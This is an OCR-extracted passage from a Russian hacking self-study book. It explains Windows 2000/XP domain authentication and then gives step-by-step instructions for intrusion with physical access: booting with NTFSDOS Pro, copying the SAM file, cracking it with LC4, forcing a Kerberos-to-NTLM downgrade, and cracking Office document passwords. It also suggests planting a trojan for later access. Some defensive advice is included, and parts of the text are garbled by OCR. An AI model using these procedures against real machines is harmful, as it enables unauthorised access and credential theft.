Например, если domenl и domen2 входят в одну ветвь, причем domen2 «выраста-ет» из domenl, то компьютеры из domen2 будут именоваться comp1.domen2.do-menl, comp2.domen2.domen1, … compN.domen2.domen1. А чтобы организоватьиз двух доменов domenl и domen2 лес, имеющий имя forest, то его имя добавляет-ся справа от имени домена. Таким образом, компьютеры в domenl будут имено-ваться compl.domenl.forest, comp2.domen1.forest , а в domen2 компьютерыбудут именоваться как compl.domen2.forest, comp2.domen2.forest, …. Междувсеми доменами леса устанавливаются двусторонние доверительные отношения.

32

Page 35: Самоучитель хакера подробное иилюстрированное руководство

Защита Windows 2000/XP

В общем, вся эта возня с доменами — занятие для системных администраторов, дляхакера тут интересно вот что: права доступа к ресурсам доменов леса или деревадля различных учетных записей зависят от их членства в трех основных группах.

• Универсальная группа (Universal group), членами которой могут быть поль-зователи всего леса, и следовательно, членство в универсальной группе пре-доставляет доступ к компьютерам всего леса.

• Глобальная группа (Global Group), членами которой могут быть толькопользователи одного домена, соответственно, членство в глобальной группепредоставляет доступ к ресурсам всего домена.

• Локальные группы домена (Local group domain), членами которой могутбыть пользователи всего леса, но локальные группы могут быть использова-ны только для управления доступом к ресурсам одного домена.

Именно эти группы следует указывать в списках ACL для задания прав доступак информационным ресурсам. Теперь хакеру все становится понятным — длявзлома сети лучше всего получить права члена универсальной группы. А дляэтого можно, например, взломать базу AD, либо перехватить в сети пароль прирегистрации пользователя на контроллере домена, либо проделать еще какую-либо штучку, коими переполнены новости с фронта виртуальных сражений.

Вообще-то база AD устроена наподобие SAM, так что для нее справедливы всете слова, что сказаны ранее про шифрование и взлом паролей в SAM. Однаковзлом AD затруднен тем обстоятельством, что размер AD, как правило, весьмавелик (до 10 Мб), и база AD хранится на серверах, которые, чаще всего, защи-щены на порядок лучше клиентских компьютеров. Таким образом, наиболее оп-тимальной стратегией хакера может быть проникновение в клиентский компью-тер с последующими попытками взлома контроллеров домена. Для этого можно,скажем, с помощью снифера перехватить пароли и логины, необходимые длявхода пользователя в домен Window 2000, во время их передачи по сети на кон-троллер домена. Такие программы существуют, например, последняя версия LC4программы LOpghtCrack снабжена эффективным механизмом перехвата и сете-вых пакетов с целью последующего взлома паролей.

Мы еще поговорим про эту в высшей степени полезную программу, но пока рас-смотрим поподробнее, как происходит процедура сетевой идентификации поль-зователей — там имеются и еще кое-какие интересные возможности.

Регистрация Ъ домене Windows 2000При регистрации пользователя в домене Windows 2000 используется процедуразапроса с подтверждением, означающая следующее. Вначале контроллер доме-на передает клиентскому компьютеру запрос — случайное число, для которого

332 — 5830

Page 36: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

клиент подсчитывает значение одной очень важной криптографической функ-ции, называемой хэш-функцией, или просто хэшем, используя при этом парольпользователя в качестве аргумента. Что такое хэш-функция, вы можете про-честь, например, в [7], здесь же ограничимся лишь указанием, что все хэш-функции имеют следующее характерное свойство. Настоящую хэш-функциюочень просто вычислить по значению аргументов, но вот наоборот, вычислитьзначения аргументов по значению хэш-функции почти невозможно, поскольку этотребует нереальных вычислительных ресурсов. Вот что это дает системе защиты.

Подсчитанную хэш-функцию клиент передает обратно контроллеру домена, иконтроллер снова подсчитывает эту же хэш-функцию для тех же аргументов -переданного клиенту значения случайного числа и пароля пользователя, кото-рый хранится в базе AD. Если оба значения хэш-функции совпадают — пользова-тель аутентифицирован, поскольку такого совпадения практически невозможнодостичь без знания аргументов — такова природа хэш-функции. Преимуществатакой аутентификации очевидны — пароль по сети не передается, а использованиеслучайного числа гарантирует невозможность повторных использований перехва-ченных запросов и ответов для прохождения сетевой регистрации.

Для хакера все эти криптографические штучки весьма интересны в следующемотношении. Во-первых, при такой сетевой аутентификации по сети передаютсявсего лишь значения хэш-функции пароля. Во-вторых, даже поверхностногознания криптографии достаточно для уяснения факта, что восстановление паро-ля по значению хэш-функции невозможно только практически, но теоретическиэто возможно, хотя бы методом прямого перебора или, как говорят в криптогра-фии, методом «грубой силы».

Объем вычислений, необходимый для взлома пароля, определяет крттостой-кость, т.е надежность протокола сетевой аутентификации. И вот тут-то и возни-кает большая дыра, в которую пролезло немало шустрых личностей, которые,исследовав методы шифрования протокола LM, пришли к выводу — взлом про-токола LM вполне возможен вследствие некой грубой криптографическойошибки (подробности можно узнать, к примеру, в [3]). Для исправления ситуа-ции Microsoft выпустила гораздо более защищенный протокол NTLM (в ServicePack 3 для Windows NT 4) и протокол NTLMv2 (в Service Pack 4 для Windows NT 4).И, наконец, в Windows 2000 появился протокол Kerberos, который стал первымпо-настоящему стойким протоколом сетевой идентификации, призваннымобезопасить сетевое взаимодействие компьютеров в процессе идентификации.Однако не тут то было.

Дело в том, что в системах Windows 2000/XP для обеспечения обратной совмес-тимости со старыми системами Windows поддерживаются все предыдущие вер-сии протоколов, включая LM. И если компьютеры Windows 2000/XP не в со-стоянии идентифицировать друг друга по протоколу Kerberos, они автоматиче-ски переходят на использование ненадежных протоколов NTLM или LM.

34

Page 37: Самоучитель хакера подробное иилюстрированное руководство

Защита Windows 2000/XP

Так что хакеры действуют следующим образом — они блокируют специальносформированными сетевыми пакетами TCP-порт 88 контроллера домена, ис-пользуемый Kerberos, и вынуждают компьютеры переходить на старые версиипротоколов аутентификации. Дальнейшее понятно без объяснения — с помощьюснифера перехватываются пакеты с паролями для идентификации по протоко-лам LM или NTLM, после чего с помощью утилиты LOphtCrack выполняетсявзлом пароля.

Таким образом, положение антихакера выглядит безнадежным — кажется, чтонет никакой возможности отбиться от хакерских попыток взлома компьютернойсети. И в самом деле, что может сделать антихакер?

АнтихакингДля защиты от столь хитроумных любителей чужих секретов прежде всего тре-буется создать эффективную политику безопасности, которая, помимо прочего,включала бы меры по ограничению физического доступа к компьютеру. Следуетчетко уяснить, что если хакер получит локальный доступ к компьютеру, то раноили поздно все содержащиеся в нем конфиденциальные данные будут раскрыты.Если компьютер подсоединен к сети, то следующим шагом хакера будет взломсетевых серверов. Как вы, наверное, уже поняли, возможностей у него будетпредостаточно.

Выработка политики безопасности и настройка системы защиты компьютерадолжна производиться постепенно, по мере накопления информации о возможныхугрозах и опыта по их парированию. Однако с самого начала эксплуатации систе-мы можно применить средство обеспечения безопасности компьютера, называе-мое шаблонами безопасности, впервые появившимися в системах Windows 2000.Эти шаблоны представляют собой целые наборы параметров системы защиты,подготовленные Microsoft для всеобщего использования, и включающие на-стройки политики безопасности для автономного компьютера, рабочей станциии контроллера домена. В системах Windows XP шаблоны безопасности получилидальнейшее развитие и обеспечивают достаточно надежную защиту от широкораспространенных атак компьютеров Windows.

Установка и настройка этих шаблонов подробно описана в справочной системеWindows 2000/XP или в книге [7], так что не будем повторяться. Начав с уста-новки шаблона безопасности, далее можно постепенно уточнять эти настройки,создав собственную базу данных системы защиты, отражающую ваш личныйопыт работы с системой. Прочность своей защиты можно проверять с помощьюсканеров безопасности, например, приложения Retina, о работе с которым мож-но прочитать в книге [7].

35

Page 38: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Наилучшим же техническим решением защиты от сетевых атак методом пере-хвата трафика является во-первых, отказ от использования старых версий про-токолов аутентификации. Во-вторых, следует прибегнуть к технологиям крип-тографической защиты, в частности, к построению сети VPN (Virtual PrivateNetwork — Виртуальная частная сеть). Технология VPN заранее предполагает,что кабельная система сети не защищена от хакерских вторжений и все переда-ваемые данные могут быть перехвачены. Поэтому весь сетевой трафик VPNшифруется надежными алгоритмами, исключающими или сильно затрудняю-щими перехват расшифровки данных.

Все эти старания, конечно, не пропадут даром, однако, как говорит известныйспециалист по криптографии Брюс Шнайер (Bruce Schneier), автор бестселлера«Прикладная криптография» (Applied Cryptography), безопасность — это процесс.Нет такого метода защиты, который сможет раз и навсегда обезопасить ком-пьютерную систему — схватка хакера и антихакера не прекратится никогда, покрайней мере, в обозримом будущем этого точно не произойдет. Так что в сле-дующей главе мы познакомимся с первым эпизодом этой Великой ВиртуальнойВойны — локальным вторжением в компьютер, т.е. наиболее эффективным иполноценным способом взлома системы.

ЗаключениеВ этой главе вы познакомились со средствами обеспечения безопасностиWindows 2000/XP и узнали о «болевых точках» системы защиты, которые ис-пользуются хакерами для выполнения наиболее широко распространенных атак.Теперь вас не смутят аббревиатуры SAM, LSA, SRM, ADS, LM, NTLM, Kerberosи так далее. Введенные здесь термины и обозначения будут использоватьсяпри описании орудий взлома систем Windows, к которым мы переходим соследующей главы. Желающие углубить свои познания в сфере средств защитыWindows 2000/XP, сетей ТСР/ГР и служб ADS могут обратиться к большому чис-лу прекрасных литературных источников, из которых можно выделить сериюкниг Microsoft Press по серверам Windows 2000.

36

Page 39: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 3

Прсжикио&еиые Ъ системуПознакомившись в предыдущей главе с системой защиты Window 2000/XP, вы,наверное, уже задались вопросом, а как же можно обойти все «ЗА» наворочен-ных средств обеспечения безопасности, которые создавало большое число ква-лифицированных специалистов? Все зависит от обстоятельств, и в Главе 2, гдебыли перечислены возможные пути вторжения в компьютер, первым в спискестояло локальное вторжение, когда хакер получает физический доступ к консолиуправления компьютерной системы, что обеспечивает ему наибольшее число воз-можностей хакинга. Вот с него мы и начнем. (Только не подумайте, что вас будутучить лазить в форточку или обшаривать помойки — для этого вы можете обра-титься к Интернету. Здесь же мы ограничимся компьютерными технологиями.)

Вообще-то возможность такого вторжения в наибольшей степени обуславлива-ется ненадлежащим выполнением правил политики безопасности организации, ато и полным ее отсутствием. Ныне вполне заурядна ситуация, когда к компью-терной сети неведомо кем и как подключено множество компьютеров, а полити-ка информационной безопасности сводится к листочку со списком паролей,приклеенным к монитору (потом их выбрасывают на помойку — ну и…).

Так что для получения локального доступа к компьютеру хакеру может и не по-требоваться орудовать отмычками, лазить через забор или в открытую форточ-ку, чтобы попасть в помещение с компьютерами. После чего, пройдя все испы-тания, бедный хакер, подсвечивая себе фонариком и пугливо озираясь, должензаняться выкручиванием винчестера для последующего исследования, или пы-таться войти в компьютерную систему, поминутно рискуя быть схваченным ипосаженным за решетку (поскольку все это — чистейшей воды уголовщина).Неужели все так страшно? Да нет же, нет — чаще всего нужно просто протянутьруку и сорвать плод, висящий над головой. Во многих случаях свободный дос-туп к компьютерному оборудованию — вещь достаточно обычная.

Итак, хакер сел за рабочий стол с компьютером и приступил к работе. Первое,что ему следует сделать — это войти в систему под учетной записью с высокимипривилегиями, лучше всего — администратора системы. Тут существуют вариан-ты, и мы их постараемся рассмотреть.

Во-первых, вполне возможна ситуация, когда и делать-то ничего не надо — со-трудник Вася Пупкин вышел на перекур и надолго застрял в курительной ком-нате за обсуждением вчерашнего футбольного матча, а его компьютер отобра-жает на экране окно проводника Windows. Это вполне реально, как и то, что намониторе может быть приклеен листочек со списком паролей доступа, и каждыйпользователь — как минимум член группы опытных пользователей, которымразрешена установка программ и доступ почти ко всем ресурсам компьютера.И чего тут удивляться, что, рано или поздно, все такие системы попадают в лапы

Page 40: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

типов наподобие доктора Добрянского (см. Главу 1), а уж они-то найдут чем тамзаняться, мало не покажется. Описанная ситуация — это полный хаос в политикебезопасности организации, и, повторяем, таких организаций — полным-полно.

Во-вторых, в более благополучных организациях на экране покинутых компью-теров может светиться заставка, защищенная паролем, или же при попытке вхо-да хакеру отображается приглашение на ввод пароля системы Windows или сис-темы BIOS компьютера. Тогда хакеру для входа в компьютер придется порабо-тать с системой защиты, и один из путей получения доступа к ресурсам компью-тера Windows 2000/XP состоит в загрузке системы со съемного носителя.

со съемного носителяЕСЛИ вход в компьютерную систему закрыт паролем доступа, то хакер можетпопытаться загрузить систему со съемного носителя — дискеты или компакт-диска (естественно, при наличии дисководов). Чего, казалось бы, проще — встав-ляй загрузочную дискету с системой MS-DOS в дисковод и включай компьютер!Однако подождите с выводами — все не так просто, и тут есть свои подводныекамни. Во-первых, загрузка системы со съемного носителя может быть запре-щена настройкой параметров BIOS системы, а доступ к параметрам BIOS закрытпаролем. Эту ситуацию мы рассмотрим в следующем разделе.

Во-вторых, даже если загрузка со съемного носителя в BIOS разрешена, то выможете столкнуться с проблемой доступа к файловой системе NTFS, поддержи-ваемой только системами Windows 2000/XP. Таким образом, после загрузки сис-темы MS-DOS вы просто-напросто не увидите жесткого диска — вожделенногохранилища информации, из-за которого все и было затеяно.

Конечно, можно быстро-быстро, потея и озираясь по сторонам, вывинтить жест-кий диск и убежать (автор категорически не советует — если поймают — все, инадолго! И потом, как говаривал О. Бендер, все это «низкий сорт, грязная работа»),чтобы потом спокойно исследовать его содержимое на своем компьютереWindows 2000/XP. Но более квалифицированный хакер поступит иначе — онприбегнет к утилите NTFSDOS Professional (http://www.winternals.com) компа-нии Winternals Software LP, которая позволяет получить доступ к дискам NTFSиз системы MS-DOS. Помимо всего прочего, эта утилита чрезвычайно полезнапри порче операционной системы, утрате пароля входа в Windows 2000/XP и вдругих случаях. Так что эта утилита полезна обоим участникам виртуальнойбитвы — и хакеру, и антихакеру. Поэтому опишем работу с утилитой NTFSDOSProfessional — она это заслужила.

38

Page 41: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

Утилита М1Т51Ю5 fro

Применение утилиты NTFSDOS Pro заключается в следующем. После инсталля-ции программы в главном меню Windows создается папка NTFSDOS Professionalс командой вызова мастера NTFSDOS Professional Boot Disk Wizard (Мастерзагрузочных дисков NTFSDOS Professional). Запуск этого мастера создает загру-зочную дискету или жесткий диск, который может быть использован для работыс томами NTFS. Опишем работу мастера по шагам.

Перед началом работы вы должны создать две загрузочные дис-кеты, воспользовавшись командами FORMAT/S или SYS системыMS-DOS. Или же можно создать эти дискеты с помощью командыформатирования Windows XP с установленным флажком Create anMS-DOS startup disk (Создать загрузочную дискету MS-DOS).

> Выберите команду главного меню Пуск * Программы » NTFSDOS Professional(Start » Programs » NTFSDOS Professional). На экране появится диалог с привет-ствием (Рис. 3.1).

wizard will help you install V/indows NT/200DvXP system files neededNTFSDOS Professional to run from a MS-DOS diskette or hard disk

PMC. 3.1. Приветственный диалог мастера установки NTFSDOS Pro

> Щелкните мышью на кнопке Next (Далее). На экране появится следующий диа-лог (Рис. 3.2), в котором отображается напоминание о необходимости иметь подрукой две загрузочные дискеты, о которых мы уже упоминали чуть выше.

> Если у вас имеются загрузочные дискеты, то нажмите кнопку Next (Далее),иначе займитесь созданием этих дискет.

По умолчанию NTFSDOS Pro использует версию набора символов MS DOS дляСША (кодовая страница 437). В отобразившемся третьем диалоге мастера(Рис. 3.3) предлагается выбрать дополнительный набор символов.

39

Page 42: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing WindowsNT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes.

If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before orafter using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to makebootable diskettes.

You can also make a bootable diskette on Windows XP by opening My Computer, selecting the»Format» option from the context menu of your diskette drive, and formatting a diskette with the «Createan MS-DOS startup disk» option checked.

< Back Next > Cancel J

Рис. З.2. Диалог с предупреждением о необходимостииметь системные дискеты

NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by defaultSelect any additional character sets you use with DOS.

Japan, code page 932Korean (Johab). code page 1361Korean, code page 949MS-DOS Canadian-French, code page 863MS-DOS Icelandic, code page 661MS-DOS Multilingual (Latin 1). code page 650MS-DOS Nordic, code page 865MS-DOS Portuguese, code page 86

MS-DOS Slavic (Latin II). code page 852

< Back Next > Cancel

Рис. З.З. Диалог выбора языковой поддержки

> Выберите требуемый набор и щелкните мышью на кнопке Next (Далее).На экране появится следующий диалог мастера установки NTFSDOS Pro(Рис. 3.4).

В этом диалоге надо указать место хранения системных файлов WindowsNT/2000/XP, необходимых NTFSDOS Pro. Следует выбрать или корневой ката-лог системы, например, C:\WINNT, либо каталог \I386 инсталляционного дискаWindows NT/2000/XP, либо компакт-диск с Service Pack.

>• Сделайте свой выбор и щелкните мышью на кнопке Next (Далее). На экранепоявится следующий диалог мастера установки NTFSDOS Pro (Рис. 3.5).

40

Page 43: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

Pro uses copies of several files located in your Windows NT/200Q/XPm directory.

Specify the name of your Windows NT/2Q.OOVXP installation directory, or a directory containing the requiredWindows NT/2000№ system files.

|c\ASFRool

<Bock Cancel

Рис. З.4. Выбор каталога с системными файлами Windows

target location is the directory from which you will run NTFSDOS Pro. It must bessiole from MS-DOS.

Specify the disk or directory from which you would like to run NTFSDOS professional. You mayselect A: to specify a floppy disk.

<Back \

Рис. З.5. Выбор места инсталляции NTFSDOS Pro

В этом диалоге необходимо указать каталог или диск для инсталляции програм-мы NTFSDOS Pro. Этот каталог или диск должен быть доступен для MS-DOS,т.е. должен быть томом FAT или FAT32. При указании диска А: мастер создастдве или три дискеты. Кнопка Advanced (Дополнительно) позволяет инсталлиро-вать NTFSDOS Pro для других систем, отличных от MS-DOS.

> Сделайте свои назначения и щелкните мышью на кнопке Next (Далее). На эк-ране появится диалог мастера установки с сообщением о начале инсталляцииNTFSDOS Pro (Рис. 3.6).

41

Page 44: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

floppy labelled NTFSDOS Professional 0

Press Next to copy files ID A:V

<Bsck Cancel

Рис. З.6. Диалог с сообщением о начале инсталляции NTFSDOS Pro

> Щелкните мышью на кнопке Next (Далее), чтобы начать копирование файлов(Рис. 3.7).

Copying files to diskette…

Cancel

Puc. 3.7. Копирование информации на дискеты

В последовательно отображаемых диалогах следует в ответ на приглашение(Рис. 3.7) помещать дискеты в дисковод и щелкать мышью на кнопке Next(Далее) для копирования файлов. При использовании системы Windows XP бу-дут созданы две дискеты с исполняемым файлом NTFSPRO.EXE и связаннымис ним файлами, которые позволят монтировать диски NTFS и работать с ними.При использовании Windows NT/2000 будет создана только одна дискета. До-полнительно будет скопирована дискета с файлами программы NTFSCHK.EXE,позволяющей выполнить проверку дисков NTFS.

42

Page 45: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

По завершении копирования файлов отобразится диалог (Рис. 3.8) с сообщениемо создании набора дискет NTFSDOS Professional.

necessary files hove been copied. You may now reboot to MS-DOSbegin using NTFSDOS Professional Edition.

Рис. З.8. Диски NTFSDOS Pro готовы

> Щелкните мышью на кнопке Finish (Завершить), чтобы завершить работумастера.

Теперь вы готовы работать с программой NTFSDOS Pro, что не вызывает особыхзатруднений. Для этого следует установить в дисковод первую дискету NTFSDOSPro и перезагрузить компьютер с этой дискеты. После этого, не вынимая дискету издисковода, следует запустить исполняемый файл NTFSPRO.EXE, который смон-тирует диски NTFS компьютера. Последующая работа с этими дисками, как исо всем компьютером, выполняется с помощью команд MS-DOS так, как этоделается при использовании файловых систем FAT и FAT32, причем утилитаNTFSDOS Pro поддерживает длинные имена файлов и папок.

Загрузив систему MS-DOS и обеспечив поддержку NTFS, вы можете безо всякихпомех со стороны системы входной регистрации Windows 2000/XP делать с сис-темой что угодно. Вы сможете копировать файлы, форматировать жесткий диск(зачем — дело ваше), и выполнять другие, не менее увлекательные действия, кото-рые едва ли понравятся хозяину компьютера. Однако, если вы — уважающий своевремя и труд хакер, вам, прежде всего, следует подумать о будущем и заняться де-лом. Например, полезно встроить в только что взломанную систему различныеинструменты для облегчения последующего доступа, что достигается установкойтрояна, который будет сообщать вам обо всех действиях пользователей. Такжеочень неплохо скопировать на свой носитель информации разные файлы и папкивзломанной системы для последующего изучения — и не забудьте о базе SAM,которая, напоминаем, находится в каталоге корень_системы/зуз1ет32/соп1’|д.

43

Page 46: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

ы 5АМ

Чтобы взломать базу SAM, вначале следует получить доступ к файлу SAM.Для этого можно прибегнуть к описанной выше утилите NTFSDOS Pro, загру-зить систему MS-DOS компьютера и скопировать файл SAM из системной пап-ки компьютера /KOpeHb_CMCTeMbi/system32/config на дискету. Далее этотфайл может быть использован для дешифрования какой-либо программой, на-пример, LC4 — новейшей версией широко известной программы LOphtCrack(http://www.atstake.com).

На Рис. 3.9 представлено окно приложения LC4 с открытым меню Import (Импорт).

Import | Senion Help

«IB?! Import From Local Machine

Import From Remote Registiy..Import From SAM File…Import From Sniffer…Import From .LC File…Import From .LCS (LC3) FileImport Frum PWDUMP File…

I <o InILM ra:

Use the Import menu to retrieve accounts to audit.

Рис. З.9. Возможности взлома паролей у программы LC4 весьма обширны

Как видим, возможности программы LC4 позволяют извлекать пароли учетныхзаписей различными методами, включая снифинг локальной сети и подключе-ние к другим сетевым компьютерам. Для взлома паролей в SAM следует выпол-нить такую процедуру:

> Выберите команду меню File * New Session (Файл * Создать сеанс). Отобра-зится диалог, подобный Рис. 3.9.

> Выберите команду меню Import »Import From SAM File (Импорт * Импорт изфайла SAM). На экране появится сообщение о недоступности файла SAM.

>• Нажмите кнопку О К и загрузите в появившемся диалоге файл SAM, полу-ченный при взломе компьютера А1ех-3.

>• В отобразившемся диалоге (Рис. 3.10) выберите команду Session » Begin Audit(Сеанс » Запуск аудита) и запустите процедуру взлома паролей учетных записей.

44

Page 47: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

?l@stakeLC4 -(Unlilbdll

File View Import Sestion Help

. i » u * т т \ ft \ т_u

lALEX-3

IALEX-З(ALEX-ЗlALEX-3

lALEX-3

lALEX-3

[ALEX-3

Administrator

ASPNET

Guett

HelpAssittant

IUSH_ALEX-3

IWAM_ALEX-3

NewUzer

• empty ‘

• empty ‘

• empty ‘

• empty ‘

• amply •

» empty ‘

‘ empty ‘

e.;Od Oh Qm us

i as

CS

mporled 7 accounts

Puc. 3.10. Ход процедуры взлома SAM отображается в панели справа

В зависимости от сложности пароля, время, необходимое для взлома SAM, мо-жет быть весьма велико. При благоприятном исходе отобразится диалог, пока-занный на Рис. 3.11, в котором представлены взломанные пароли SAM.

AdnuniitialoiASPNETGue»lHelpAti.tlonlIUSH.ALEX-3IWAM.ALEX-3NenUter

Рис. 3.11. Пароли базы SAM взломаны!

Все это очень интересно, поскольку теперь мы знаем пароль учетной записи ад-министратора — 007 и, следовательно, можем делать с компьютером что угодно.Время, потраченное на взлом пароля, составляет около 5 минут на компьютереPentium 2 с частотой процессора 400 МГц. Такая скорость обусловлена просто-

45

Page 48: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

той пароля — всего три цифры, что позволило программе LC4 быстро перебратьвсе комбинации цифр и символов.

Для настройки процедуры взлома в программе LC4 применяется диалог AuditingOptions For This Session (Параметры аудита для текущего сеанса), представлен-ный на Рис. 3.12.

Dictionary Crack —

D EnabledDictionary List [

The Dictionary Deck tests For passwords that are the same as the words listed in theword file. This test is very fast and finds the weakest passwords.

Dictionary/Brute Hybrid Crack

El Enabled |0 Characters to prepend

3 I П Characters to append

П Common letter substitutions (much slower)

The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words inthe word file. It finds passwords such as «Dana99» or «monkeys!». This test is fast andfinds weak passwords.

Brute Force Crack-

El Enabled

D Distributed

Character Set

|A-ZandO-9

Custom Claraclw Set Ш «ch ch«*:ttrt

Ptrtli. I Oil J

The Brute Force Crack tests fa passwords that are made up of the characters specifiedin the Character Set. It finds passwords such as «WeR3pll6s» a «vC5«69t12b». Thislest is slow and finds medium to strong passwords. Specify a character set with morecharacters to crack stronger passwords.

OK Cancel

Puc. 3.12. Параметры настройки процедуры взлома паролей

Как видим, параметры работы LC4 разделены на три группы:

Dictionary Crack (Взлом по словарю), в которой содержится кнопка DictionaryList (Список словарей), отображающая диалог для выбора словаря с тестируе-мым набором слов. Вместе с программой LC4 поставляется небольшой словарьанглийских слов, однако в Интернете можно найти весьма обширные словари, по-зволяющие хакеру быстро перебрать практически все общераспространенныеслова английского языка. Отсюда понятно, почему не следует при выборе пароляиспользовать осмысленные словосочетания, например, имена, названия городов,предметов и т.д., поскольку все они элементарно взламываются словарной атакой.

Dictionary/Brute Hybrid Crack (Словарь/Комбинированный силовой взлом), гдеможно указать число цифр, добавляемых после и/или перед словом, выбраннымиз словаря, перед тестированием полученной строки. Так что если вы выберетесебе пароль типа Password???, его взлом неминуем.

46

Page 49: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

Brute Force Crack (Взлом грубой силой), где вы можете настроить взлом паро-лей прямым перебором всех комбинаций символов из указанного набора. Этонаиболее трудоемкий взлом паролей, и его успех зависит от сложности паролейи мощности компьютера. В открывающемся списке Character Set (Набор сим-волов) можно выбрать набор применяемых при взломе символов или, выбравпункт Custom (Пользовательский), ввести в ставшее доступным поле CustomCharacter Set (List each character) (Пользовательский набор символов (пере-числите каждый символ)) набор дополнительных символов. Установка флажкаDistributed (Распределенный) предоставляет возможность вычислять парольсразу на нескольких компьютерах. Для этого следует командой File » SaveDistributed (Файл » Сохранить распределенный) сохранить файл сеанса в виденескольких частей и исполнять их на нескольких компьютерах.

Программа LC4 представляет собой весьма мощный инструмент взлома защитыWindows NT/2000/XP. Мы еще вернемся к ней при обсуждении средств сетевоговзлома компьютеров Windows, а сейчас познакомимся с популярной программойвзлома систем Windows 95/98, называемой Pwltool.

‘Рзлом доступа к файлам и лапкамЧисло инструментов для взлома паролей доступа к информационным ресур-сам Windows весьма значительно, поэтому здесь мы опишем только некото-рые, завоевавшие определенную популярность в хакерских кругах. Мы обсу-дим пакет инструментов взлома документов MS Office компании Элкомсофт(http://www.elcomsoft.com), который так и называется — OfficePassword 3.5.После этого мы продвинемся чуть дальше и покажем, как можно выловить па-роли доступа к различным ресурсам, скрытые за строкой звездочек «*******»Эту задачу прекрасно решает завоевавшая широкую популярность утилитаRevelation от компании SnadBoy (http://www.snadboy.com).

Если у вас возникнет желание продвинуться в этом направлении ипознакомиться с другими инструментами, то мы советуем обра-тить внимание на такую утилиту взлома паролей архивных файлов,как AZPR компании Элкомсофт, или к набору утилит Passware Kit,предоставляемых на сайте http://www.lostpassword.com. Послед-ние утилиты обеспечивают взлом самых разнообразных ресурсовWindows — сообщений электронной почты, /СО, архивов, докумен-тов, кошельков Window — но уступают OfficePassword по гибкостинастройки процесса взлома.

47

Page 50: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Пакет OfficePassword 3.5

Пакет инструментов OfficePassword 3.5 выглядит весьма впечатляюще и состоитиз целого набора инструментов взлома доступа к документам Lotus Organizer,MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, докумен-там MS Office — Excel, Word, Access, Outlook, к архивам ZIP и даже к модулямVBA, встроенным в документы MS Office.

Программы OfficePassword 3.5 снабженыудобным графическим интерфейсом ивесьма эффективными средствами на-стройки процедур взлома. Давайте убе-димся в этом на примере взлома доступак документу Word с очень заманчивымназванием password.doc, который дол-жен содержать пароли — а иначе зачем еготак называть?

Password ИИ

Enter password to open fileС : \test\password . doc

II

[ OK

1

Cancel

Puc. 3.13. Диалог ввода паролядоступа к документу Word

Итак, выполнив поиск по файловой сис-теме Windows, вы натолкнулись на файлpassword.doc, который при попытке от-крытия отображает диалог с предложени-ем ввести пароль (Рис. 3.13).

Вводить пароли наугад — дело бесперспек-тивное, так что мы устанавливаем пакетпрограмм OfficePassword 3.5 и выполняемтакие шаги:

>• Выберите команду меню Пуск • Про-граммы • OfficePassword (Start •Programs * OfficePassword). Отобра-зится диалог программ OfficePass-word (см. Рис. 3.14).

> Щелкните на кнопке Select documentотобразившегося стандартного диалогамого документа MS Office.

I OfficePassword «DEMO»

File Took Option* Help

Я1-Ш]

Selecl document

You can also diag-and-drop files from Internet Explorer onto thiswindow.

>» (c) 1998-2001 Vitas Ramanchauskas. LastBit Software <«http://lastbit.com

«»» DEMO Version ™»

| Register to upgrade to a full-functional veision! |

Puc. 3.14. Главный диалогOfficePassword очень прост

(Выберите документ) и с помощьюWindows выберите файл взламывае-

Чтобы повторить описываемую здесь пошаговую процедуру, следу-ет предварительно создать файл документа Word с парольной за-щитой. Как это сделать, можно прочитать в справке программыMS Word или в любом из многочисленных руководств. Учтите, чтодемо-версия программы OfficePassword позволяет взламывать па-роли длиной не более 3-х символов.

48

Page 51: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

Далее последовательно отобразятся два диалога с предупреждениями об ограни-чении демо-версии программы только тремя символами пароля, а также о воз-можной длительности процесса взлома пароля.

>• Оба раза щелкните на кнопке О К, и на экране появится диалог Select recoverymode (Выберите режим восстановления), представленный на Рис. 3.15.

Select lecoverv mode

Jocument path: C:\test\passwotddoc (Word)Version : Wotd 8.0+ntemal version: 133

Word language : Russian (0419)incryption type: StrongText size : 537

Preview

© AutomaticOflicePassword automatically selects most suitable recovery options. Recovery may take alot of time (up to several months in case ol a long password]. About 80% of all passwordscould be recovered within 48 hours. Use guaranteed recovery otherwise.

О User-defined

Adjust settings to optimize search for specific case. (This option is for advanced useis only.)

О Guaranteed recoverySuccess is guaranteed! Important: please read the documentation. Additional fee may apply.

I Click here to learn тогеП

Cancel | Display help info Next»

Puc. 3.15, Взламывать пароль можно несколькими методами

> В диалоге Select recovery mode (Выберите режим восстановления) можновыбрать такие режимы взлома пароля:

• Automatic (Автоматический режим), который наиболее прост для применения,поскольку требует только щелчка на кнопке Next (Далее), после чего запус-тится процедура, использующая наиболее широко используемые возможностивзлома пароля.

• User-defined (Пользовательский режим), позволяющий вручную настроитьпроцедуру поиска пароля. Этот режим рекомендуется только для подготовлен-ных пользователей.

• Guaranteed recovery (Гарантирован-ное восстановление), которое, по ут-верждению авторов, способно вос-становить любой пароль, независимоот его длины.

> После выбора режима взлома па-роля щелкните на кнопке Next

lOlficePasswoid ‘DEMO*

Password found:’007′ (without quotes)The password has been copied onto the clipboard

Would you like to open the document now?

L Yes No

Puc. 3.16. Пароль успешно взломан!

49

Page 52: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

